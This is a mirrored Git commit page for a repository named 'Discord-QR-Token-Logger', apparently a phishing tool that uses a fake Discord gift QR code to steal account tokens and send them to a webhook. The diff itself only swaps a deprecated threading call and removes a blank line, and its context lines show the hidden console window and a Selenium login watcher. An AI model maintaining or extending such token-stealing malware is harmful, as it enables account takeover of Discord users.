mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-06-14 14:55:17 +00:00
Update main.py
This commit is contained in:
parent
e68e786a62
commit
a55b74b0d4
@ -98,7 +98,7 @@ def main(webhook_url: str) -> None:
|
|||||||
ctypes.windll.kernel32.GetConsoleWindow(), 0)
|
ctypes.windll.kernel32.GetConsoleWindow(), 0)
|
||||||
def timer_killer(q, e):
|
def timer_killer(q, e):
|
||||||
while True:
|
while True:
|
||||||
if e.isSet() != True:
|
if e.is_set() != True:
|
||||||
if discord_login != main.driver.current_url:
|
if discord_login != main.driver.current_url:
|
||||||
try:
|
try:
|
||||||
os.remove('discord_gift.png')
|
os.remove('discord_gift.png')
|
||||||
@ -206,4 +206,3 @@ if __name__ == "__main__":
|
|||||||
while th_main.is_alive():
|
while th_main.is_alive():
|
||||||
time.sleep(SLEEP_TIME)
|
time.sleep(SLEEP_TIME)
|
||||||
pystray_icon.icon.stop()
|
pystray_icon.icon.stop()
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user